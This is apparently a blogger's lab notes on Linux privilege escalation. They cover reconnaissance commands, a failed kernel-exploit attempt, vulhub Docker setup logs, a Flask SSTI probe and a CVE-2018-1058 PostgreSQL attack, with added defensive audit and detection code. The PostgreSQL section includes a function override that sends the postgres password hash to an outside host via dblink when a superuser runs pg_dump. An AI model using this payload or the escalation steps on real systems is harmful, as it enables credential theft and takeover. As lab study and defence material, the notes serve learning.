Linux privilege escalation
Kernel exploit privilege escalation
Kernel exploit privilege escalation means that an ordinary user reaches the operating system kernel and uses a kernel vulnerability to raise their privileges to root. The usual steps are:
(1) Information gathering, e.g. checking the current user's privileges, the system version and the kernel version
(2) Finding an EXP based on the information gathered
(3) Using the EXP to escalate privileges
1. Common information-gathering commands
Show all system information: uname -a
Show the kernel version: uname -r
Show kernel information: cat /proc/version
Show the CentOS version: cat /etc/*-release
Show the Ubuntu or Debian version: cat /etc/issue
Show the RedHat version: cat /etc/redhat-release
Show the current user: whoami
Show the current user's ID: id
Show environment variables: env
Show the current PATH variable: echo $PATH
List all users on the system: cat /etc/passwd
Find users with UID 0: awk -F: '($3==0){print $1}' /etc/passwd
Find files with the SUID bit set: find / -user root -perm -4000 -exec ls -ldb {} \;
This is the same as the Windows privilege escalation in the privilege escalation post I wrote earlier.
At the time I did not know whether the Ubuntu system I was using was vulnerable, so I tried to reproduce it, but it failed; that is how the VMware Tools installation and the reproduction process below came about.
1. Create a low-privilege user test on Ubuntu and set its password
useradd -d /home/test -m test
passwd test
2. Then switch to the test user, check whether the kernel version is lower than 5.1.17, and check the current user and the current user's UID
Run git clone https://github.com/bcoles/kernel-exploits.git
My Ubuntu could not run it, so I used VMware Tools to download the file instead.
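The information-gathering list above and the kernel-version check in step 2 are the two things an auditor wants to automate before deciding whether a host needs patching. The following is an added example, not part of the original post: it reproduces the awk UID-0 check over /etc/passwd text and compares a uname -r string against a version threshold such as the 5.1.17 mentioned in step 2. The sample /etc/passwd content and kernel strings are constructed for the example; the threshold value is taken from the post.

```python
"""Audit helpers for the information-gathering step: spot extra UID-0 accounts
in /etc/passwd and check a kernel release string against a version threshold.
Added example; the sample passwd content and kernel strings are constructed."""
import re
from typing import List, Tuple

# Constructed sample, not from a real host: a second UID-0 account "backup"
# has been added next to root.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup:x:0:0::/home/backup:/bin/bash
test:x:1001:1001::/home/test:/bin/bash
"""


def uid_zero_accounts(passwd_text: str) -> List[str]:
    """Equivalent of awk -F: '($3==0){print $1}' /etc/passwd: every account
    whose UID field is 0 has full root privileges, whatever its name."""
    names = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0":
            names.append(fields[0])
    return names


def parse_kernel_release(release: str) -> Tuple[int, int, int]:
    """Turn a `uname -r` string such as '5.4.0-42-generic' into (5, 4, 0).
    Only the leading major.minor.patch is compared; distro suffixes are
    ignored because they do not change the upstream version number."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def kernel_older_than(release: str, threshold: Tuple[int, int, int]) -> bool:
    """True when the running kernel is below the threshold (e.g. (5, 1, 17)).
    A True result means 'review distro backports and patch': distro kernels
    often carry fixes without a version bump, so this is a triage signal,
    not proof of exploitability."""
    return parse_kernel_release(release) < threshold


def audit(passwd_text: str, release: str, threshold=(5, 1, 17)) -> List[str]:
    """Collect human-readable findings for the two checks."""
    findings = []
    extra = [n for n in uid_zero_accounts(passwd_text) if n != "root"]
    if extra:
        findings.append(f"additional UID-0 accounts: {', '.join(extra)}")
    if kernel_older_than(release, threshold):
        findings.append(f"kernel {release} is below {'.'.join(map(str, threshold))}")
    return findings


if __name__ == "__main__":
    # On a real host read open('/etc/passwd').read() and os.uname().release.
    for finding in audit(SAMPLE_PASSWD, "4.15.0-20-generic"):
        print("[!]", finding)
```

On a live system replace the constructed inputs with the contents of /etc/passwd and os.uname().release; any UID-0 account other than root and any kernel below the threshold is a finding to follow up.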
Installing VMware Tools on Ubuntu
Open VMware Workstation, boot the Ubuntu system, then go to the menu bar - VM - Install VMware Tools. The "Install VMware Tools" option cannot be clicked unless the Ubuntu system is running, as shown below:
After the steps above the VMware Tools installation starts; answer yes/no at the prompts until "Enjoy, --the VMware team" appears as shown below, which means the installation succeeded; then reboot the virtual machine manually:
After the reboot, the menu bar - VM - Install VMware Tools entry changes to "Reinstall", which also confirms that VMware Tools was installed successfully:
Error: permission denied
Error: permission denied; anyone who has looked into this, feel free to discuss.
Downloading vulhub on Kali 2021.1
Since the escalation above failed, I downloaded vulhub to reproduce a specific privilege escalation vulnerability directly.
First see the Kali update-source error below: it came down to updating the package list and packages; switch the source first, then install.
After boot, choose Start installer and set the time zone, account, partitioning, language and so on; after the reboot, enter the account and password you set. I log in with my account guiltyfet.
Before installing Vulhub on Kali, first update and add a domestic (China) mirror, otherwise it will not succeed.
Update the package sources: apt-get update
Install the HTTPS transport and CA certificates: apt-get install -y apt-transport-https ca-certificates
Install Docker: apt install docker.io
Show the Docker version: docker -v
Show Docker information (list all containers): docker ps -a
Install docker-compose: pip3 install docker-compose
Show the docker-compose version: docker-compose -v
Download Vulhub: git clone https://github.com/vulhub/vulhub.git
Check the Docker service after starting the environment: systemctl status docker -l
View the running environment: docker-compose ps
Shut it down: docker-compose down
systemctl status docker.service                                                    1 ⨯
● docker.service - Docker Application Container Engine
     Loaded: loaded (/lib/systemd/system/docker.service; enabled; vendor pre>
     Active: failed (Result: exit-code) since Tue 2021-06-01 15:27:46 CST; 5>
TriggeredBy: ● docker.socket
       Docs: https://docs.docker.com
    Process: 1311 ExecStart=/usr/sbin/dockerd -H fd:// $DOCKER_OPTS (code=ex>
   Main PID: 1311 (code=exited, status=1/FAILURE)
        CPU: 61ms

6月 01 15:27:46 guiltyfet systemd[1]: docker.service: Failed with result 'ex>
6月 01 15:27:46 guiltyfet systemd[1]: Failed to start Docker Application Con>
6月 01 15:27:46 guiltyfet systemd[1]: docker.service: Scheduled restart job,>
6月 01 15:27:46 guiltyfet systemd[1]: Stopped Docker Application Container E>
6月 01 15:27:46 guiltyfet systemd[1]: docker.service: Start request repeated>
6月 01 15:27:46 guiltyfet systemd[1]: docker.service: Failed with result 'ex>
6月 01 15:27:46 guiltyfet systemd[1]: Failed to start Docker Application Con>
6月 01 15:28:10 guiltyfet systemd[1]: docker.service: Start request repeated>
6月 01 15:28:10 guiltyfet systemd[1]: docker.service: Failed with result 'ex>
6月 01 15:28:10 guiltyfet systemd[1]: Failed to start Docker Application Con>
Kali update-source error: it came down to the package list and package updates
# Linux kernel update
apt-get install linux-headers-$(uname -r)
apt-get clean          # clear the cached package index
apt-get update         # refresh the index files
apt-get upgrade        # upgrade the installed packages
apt-get dist-upgrade   # upgrade following dependency changes
Start by refreshing the package list and upgrading the packages:
apt-get update && apt-get upgrade
Once that finishes, run the distribution upgrade:
apt-get dist-upgrade
Clean up:
apt-get clean
Reboot the system:
reboot
Change the APT sources (sources.list)
vim /etc/apt/sources.list
Kali 2.0: replace the APT sources with domestic mirrors and update the system
Then choose whichever mirror is fastest for you (these entries use the Kali 2.0 "sana" suite; a rolling Kali release such as 2021.1 uses the kali-rolling suite instead):
# USTC Kali mirror
deb http://mirrors.ustc.edu.cn/kali sana main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free
deb-src http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free
# Aliyun Kali mirror
deb http://mirrors.aliyun.com/kali sana main non-free contrib
deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
3. Do a full update of the installed software:
apt-get update && apt-get upgrade
apt-get dist-upgrade
apt-get clean
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -
Warning: apt-key is deprecated. Manage keyring files in trusted.gpg.d instead (see apt-key(8)).
OK
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# sudo add-apt-repository \
    "deb [arch=amd64] https://download.docker.com/linux/ubuntu \$(lsb_release -cs) \stable"
sudo: add-apt-repository:找不到命令
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# sudo apt-get install docker-ce                                                   1 ⨯
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成
没有可用的软件包 docker-ce,但是它被其它的软件包引用了。
这可能意味着这个缺失的软件包可能已被废弃,
或者只能在其他发布源中找到
E: 软件包 docker-ce 没有可安装候选
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# apt-get install -y apt-transport-https ca-certificates                         100 ⨯
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成
apt-transport-https 已经是最新版 (2.2.3)。
ca-certificates 已经是最新版 (20210119)。
下列软件包是自动安装的并且现在不需要了:
  python-babel-localedata python3-babel
使用'apt autoremove'来卸载它(它们)。
升级了 0 个软件包,新安装了 0 个软件包,要卸载 0 个软件包,有 0 个软件包未被升级。
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# apt install docker.io
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成
docker.io 已经是最新版 (20.10.5+dfsg1-1+b1)。
下列软件包是自动安装的并且现在不需要了:
  python-babel-localedata python3-babel
使用'apt autoremove'来卸载它(它们)。
升级了 0 个软件包,新安装了 0 个软件包,要卸载 0 个软件包,有 0 个软件包未被升级。
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# docker -v
Docker version 20.10.5+dfsg1, build 55c4c88
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# systemctl start docker
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# docker ps -a
CONTAINER ID   IMAGE     COMMAND   CREATED   STATUS    PORTS     NAMES
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# apt-get install python3-pip
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成
python3-pip 已经是最新版 (20.3.4-2)。
python3-pip 已设置为手动安装。
下列软件包是自动安装的并且现在不需要了:
  python-babel-localedata python3-babel
使用'apt autoremove'来卸载它(它们)。
升级了 0 个软件包,新安装了 0 个软件包,要卸载 0 个软件包,有 0 个软件包未被升级。
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# pip3 install docker-compose
Requirement already satisfied: docker-compose in /usr/local/lib/python3.9/dist-packages (1.29.2)
Requirement already satisfied: texttable<2,>=0.9.0 in /usr/lib/python3/dist-packages (from docker-compose) (1.6.3)
Requirement already satisfied: jsonschema<4,>=2.5.1 in /usr/lib/python3/dist-packages (from docker-compose) (3.2.0)
Requirement already satisfied: requests<3,>=2.20.0 in /usr/lib/python3/dist-packages (from docker-compose) (2.25.1)
Requirement already satisfied: PyYAML<6,>=3.10 in /usr/lib/python3/dist-packages (from docker-compose) (5.3.1)
Requirement already satisfied: dockerpty<1,>=0.4.1 in /usr/local/lib/python3.9/dist-packages (from docker-compose) (0.4.1)
Requirement already satisfied: distro<2,>=1.5.0 in /usr/lib/python3/dist-packages (from docker-compose) (1.5.0)
Requirement already satisfied: docker[ssh]>=5 in /usr/local/lib/python3.9/dist-packages (from docker-compose) (5.0.0)
Requirement already satisfied: python-dotenv<1,>=0.13.0 in /usr/local/lib/python3.9/dist-packages (from docker-compose) (0.17.1)
Requirement already satisfied: websocket-client<1,>=0.32.0 in /usr/lib/python3/dist-packages (from docker-compose) (0.57.0)
Requirement already satisfied: docopt<1,>=0.6.1 in /usr/local/lib/python3.9/dist-packages (from docker-compose) (0.6.2)
Requirement already satisfied: paramiko>=2.4.2 in /usr/lib/python3/dist-packages (from docker[ssh]>=5->docker-compose) (2.7.2)
Requirement already satisfied: six>=1.3.0 in /usr/lib/python3/dist-packages (from dockerpty<1,>=0.4.1->docker-compose) (1.16.0)
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# docker-compose -v
docker-compose version 1.29.2, build unknown
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# git clone https://github.com/vulhub/vulhub.git
fatal: 目标路径 'vulhub' 已经存在,并且不是一个空目录。
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# cd /vulhub/flask/ssti                                                          128 ⨯
cd: 没有那个文件或目录: /vulhub/flask/ssti
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# cd /vulhub                                                                       1 ⨯
cd: 没有那个文件或目录: /vulhub
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# ls                                                                               1 ⨯
公共  模板  视频  图片  文档  下载  音乐  桌面  vulhub
┌──(root💀guiltyfet)-[/home/guiltyfet]
└─# cd vulhub
┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub]
└─# cd flask/ssti
┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/flask/ssti]
└─# docker-compose build
web uses an image, skipping
┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/flask/ssti]
└─# docker-compose up -d
Creating network "ssti_default" with the default driver
Pulling web (vulhub/flask:1.1.1)...
1.1.1: Pulling from vulhub/flask
c7b7d16361e0: Pull complete
b7a128769df1: Pull complete
1128949d0793: Pull complete
667692510b70: Pull complete
bed4ecf88e6a: Pull complete
94d1c1cbf347: Pull complete
ac097723595b: Pull complete
e7028784d190: Pull complete
16fffdb8dec4: Pull complete
20a91e71c5f1: Pull complete
Digest: sha256:20d202d35fe99818878a3f844362210a21894bfab57b8acf23dfa3ade9a87026
Status: Downloaded newer image for vulhub/flask:1.1.1
Creating ssti_web_1 ... done
┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/flask/ssti]
└─# docker-compose ps
   Name                 Command               State           Ports
----------------------------------------------------------------------------
ssti_web_1   /bin/sh -c gunicorn -w 4 - ...   Up      0.0.0.0:8000->8000/tcp
┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/flask/ssti]
└─#
A simple reproduction of the Flask SSTI vulnerability
t = Template("hello " + name)
Here the function takes the parameter from the GET request and passes it straight into Template, so arbitrary template syntax can be injected.
Verification method
Construct: http://127.0.0.1:8000/?name={{1*9}}
┌──(root💀guiltyfet)-[/home/…/vulhub/flask/ssti/src]
└─# cat app.py
from flask import Flask, request
from jinja2 import Template

app = Flask(__name__)


@app.route("/")
def index():
    name = request.args.get('name', 'guest')
    t = Template("Hello " + name)
    return t.render()


if __name__ == "__main__":
    app.run()
┌──(root💀guiltyfet)-[/home/…/vulhub/flask/ssti/src]
└─# docker-compose down
Stopping ssti_web_1 ... done
Removing ssti_web_1 ... done
Removing network ssti_default
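The root cause in app.py is that user input becomes part of the template source rather than template data. The following is an added example, not vulhub's app.py: it renders the same greeting three ways with the post's {{1*9}} probe, so the vulnerable concatenation can be compared directly with the fixed form that passes name as context, plus a sandboxed variant for defence in depth, and it includes the check a tester applies to the response. It assumes jinja2 (the engine Flask uses) is installed; Flask itself is not needed.

```python
"""Added example: Jinja2 rendering done the vulnerable way (input in the
template source) and the fixed way (input as template data). Assumes jinja2
is installed; the probe string is the one used in the post."""
try:
    from jinja2 import Template
    from jinja2.sandbox import SandboxedEnvironment
    JINJA2_AVAILABLE = True
except ImportError:  # keeps the module importable where jinja2 is absent
    JINJA2_AVAILABLE = False

PROBE = "{{1*9}}"  # harmless arithmetic probe from the post


def render_vulnerable(name: str) -> str:
    """The pattern from app.py: user input is concatenated into the template
    source, so Jinja2 parses and evaluates whatever syntax it contains."""
    return Template("Hello " + name).render()


def render_fixed(name: str) -> str:
    """Hardened form: the template source is a constant and the user value is
    passed as context data; Jinja2 prints it back as text and never parses it."""
    return Template("Hello {{ name }}").render(name=name)


def render_fixed_sandboxed(name: str) -> str:
    """Defence in depth: templates that must stay dynamic should be rendered
    in SandboxedEnvironment, which blocks attribute access that reaches
    Python internals. Input still goes in as data, not source."""
    env = SandboxedEnvironment(autoescape=True)
    return env.from_string("Hello {{ name }}").render(name=name)


def probe_was_evaluated(response: str) -> bool:
    """Detection check for a response to ?name={{1*9}}: if the arithmetic was
    evaluated, the page shows '9' where the literal probe text should be."""
    return PROBE not in response and "Hello 9" in response


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PROBE))        # Hello 9
    print("fixed:     ", render_fixed(PROBE))             # Hello {{1*9}}
    print("sandboxed: ", render_fixed_sandboxed(PROBE))   # Hello {{1*9}}
```

The same rule applies to Flask's render_template_string: pass user values as keyword arguments, never format them into the template string. The sandbox is a second layer only; it does not make concatenation safe.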
PostgreSQL privilege escalation that did not succeed: CVE-2018-1058
┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/postgres/CVE-2018-1058]
└─# docker-compose up -d
Creating network "cve-2018-1058_default" with the default driver
Pulling postgres (vulhub/postgres:9.6.7)...
9.6.7: Pulling from vulhub/postgres
550fe1bea624: Pull complete
e38742f30225: Pull complete
a3070ac4b15d: Pull complete
f08c1d225f05: Pull complete
95a4ac3fddb4: Pull complete
149901e1c6d7: Pull complete
2ef2a35c62db: Pull complete
ad88186a11bf: Pull complete
51310786a9a6: Pull complete
Digest: sha256:66c0bb2ba0398c311bcca0d6b9373c396decbb4eb6286435659b15ec334b4315
Status: Downloaded newer image for vulhub/postgres:9.6.7
Creating cve-2018-1058_postgres_1 ... done
┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/postgres/CVE-2018-1058]
└─# psql --host 192.168.80.131 --username vulhub
用户 vulhub 的口令:
psql (13.2 (Debian 13.2-1), 服务器 9.6.7)
输入 "help" 来获取帮助信息.

vulhub=>
vulhub=> help
您正在使用psql, 这是一种用于访问PostgreSQL的命令行界面.
键入:  \copyright 显示发行条款
       \h 显示 SQL 命令的说明
       \? 显示 pgsql 命令的说明
       \g 或者以分号(;)结尾以执行查询
       \q 退出
vulhub=> \q
┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/postgres/CVE-2018-1058]
└─# psql --host 192.168.80.131 --username vulhub
用户 vulhub 的口令:
psql (13.2 (Debian 13.2-1), 服务器 9.6.7)
输入 "help" 来获取帮助信息.

vulhub=> CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
vulhub$> select dblink_connect((select 'hostaddr=192.168.80.200 port=8888 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres')));
vulhub$> SELECT pg_catalog.array_to_string($1,$2);
vulhub$> $$ LANGUAGE SQL VOLATILE;
CREATE FUNCTION
vulhub=> docker-compose exec postgres pg_dump -U postgres -f evil.bak
vulhub-> exit
使用\q 退出.
vulhub-> \q
┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/postgres/CVE-2018-1058]
└─# docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub
pg_dump: [archiver (db)] query failed: ERROR:  could not establish connection
DETAIL:  could not connect to server: Host is unreachable
        Is the server running on host "192.168.80.200" and accepting
        TCP/IP connections on port 8888?
CONTEXT:  SQL function "array_to_string" statement 1
pg_dump: [archiver (db)] query was: SELECT proretset, prosrc, probin, pg_catalog.pg_get_function_arguments(oid) AS funcargs, pg_catalog.pg_get_function_identity_arguments(oid) AS funciargs, pg_catalog.pg_get_function_result(oid) AS funcresult, array_to_string(protrftypes, ' ') AS protrftypes, proiswindow, provolatile, proisstrict, prosecdef, proleakproof, proconfig, procost, prorows, proparallel, (SELECT lanname FROM pg_catalog.pg_language WHERE oid = prolang) AS lanname FROM pg_catalog.pg_proc WHERE oid = '16432'::pg_catalog.oid
A point I don't quite understand
Exit: exit. Then I listen on port 5433 on 192.168.244.134, waiting for the superuser to trigger the "backdoor" we left behind by running pg_dump as the superuser: docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub, which exports the contents of the vulhub database. While this command runs, the "backdoor" is triggered and the machine 192.168.244.134 has received the sensitive information:
I did not understand how this step works. Hoping someone more experienced can explain!
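From the defender's side, the pg_dump error above is itself the evidence of what CVE-2018-1058 is about: the CONTEXT line shows that the superuser's unqualified call to array_to_string resolved to the function created in the public schema, because the default search_path puts public before pg_catalog for functions that do not exist there with that signature. Catching that pattern before a superuser session reaches it is a monitoring job. The following is an added example, not part of the post or vulhub: it scans SQL text (a statement log or a schema dump) for functions created in a search_path schema whose names collide with pg_catalog built-ins. The built-in name list is a small illustrative subset and the sample log lines are constructed; the hardening statements are the ones from the PostgreSQL advisory for this CVE.

```python
"""Added example: detect CREATE FUNCTION statements that shadow pg_catalog
names in the public schema (the CVE-2018-1058 pattern). Sample log lines are
constructed; PG_CATALOG_FUNCTIONS is an illustrative subset (assumption)."""
import re
from typing import List, Tuple

# Illustrative subset (assumption). In production load the real list with:
#   SELECT proname FROM pg_proc WHERE pronamespace = 'pg_catalog'::regnamespace;
PG_CATALOG_FUNCTIONS = {
    "array_to_string", "lower", "upper", "length", "substr", "now", "format",
    "to_char", "quote_ident", "pg_get_function_arguments",
}

# Matches "CREATE [OR REPLACE] FUNCTION [schema.]name(" in any case.
CREATE_FUNCTION_RE = re.compile(
    r"CREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\s+"
    r"(?:(?P<schema>\w+)\.)?(?P<name>\w+)\s*\(",
    re.IGNORECASE,
)

# Constructed sample of log_statement output: the signature from the post,
# a benign application function, and an unqualified definition.
SAMPLE_LOG = """\
LOG:  statement: CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$ SELECT 1; SELECT pg_catalog.array_to_string($1,$2); $$ LANGUAGE SQL VOLATILE;
LOG:  statement: CREATE FUNCTION public.report_total(int) RETURNS int AS $$ SELECT $1 * 2 $$ LANGUAGE SQL;
LOG:  statement: CREATE OR REPLACE FUNCTION lower(text) RETURNS text AS $$ SELECT $1 $$ LANGUAGE SQL;
"""


def shadowing_functions(sql_text: str, search_path_schemas=("public",)) -> List[Tuple[str, str]]:
    """Return (schema, name) pairs for functions defined in a search_path
    schema that collide with a pg_catalog name. An unqualified CREATE
    FUNCTION lands in the first writable search_path schema (public by
    default), so a missing schema qualifier is treated as 'public'."""
    hits = []
    for m in CREATE_FUNCTION_RE.finditer(sql_text):
        schema = (m.group("schema") or "public").lower()
        name = m.group("name").lower()
        if schema in search_path_schemas and name in PG_CATALOG_FUNCTIONS:
            hits.append((schema, name))
    return hits


# Server-side mitigations from the PostgreSQL advisory for CVE-2018-1058:
# stop ordinary roles creating objects in public, and make privileged roles
# resolve pg_catalog first. Upgrading past 9.6.8 / 10.3 also makes pg_dump
# itself use a safe search_path.
HARDENING_SQL = [
    "REVOKE CREATE ON SCHEMA public FROM PUBLIC;",
    'ALTER ROLE postgres SET search_path = pg_catalog, "$user";',
]


if __name__ == "__main__":
    for schema, name in shadowing_functions(SAMPLE_LOG):
        print(f"[!] {schema}.{name} shadows pg_catalog.{name}")
    print("Recommended hardening:")
    for stmt in HARDENING_SQL:
        print("   ", stmt)
```

Feed it the output of log_statement = 'ddl' or a pg_dump --schema-only file; any hit means a superuser tool running with the default search_path could execute that function's body under the superuser's privileges, which is exactly what the error in the post shows happening (the outbound connection attempt failed only because nothing was listening on 192.168.80.200:8888).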